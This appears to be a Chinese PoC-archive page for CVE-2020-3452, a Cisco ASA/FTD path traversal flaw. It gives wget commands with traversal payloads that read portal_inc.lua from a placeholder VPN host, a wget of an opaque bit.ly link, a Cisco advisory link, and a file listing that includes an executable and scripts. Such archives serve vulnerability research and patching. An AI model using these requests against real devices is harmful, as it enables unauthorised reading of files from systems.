关联漏洞
介绍
#CVE-2020-3452
#CVSS 7.5 (base)
wget https://bit.ly/32Q065t
wget https://vpn.target.local:443/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
wget https://vpn.target.local:443/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
#Patch From CISCO
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86
文件快照
[4.0K] /data/pocs/c1c4f1780f3d7113449d7fa09a348a5e6bf45068
├── [ 26K] cisco_asa_poc.exe
├── [ 721] poc.ps1
├── [ 425] poc.sh
└── [ 464] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。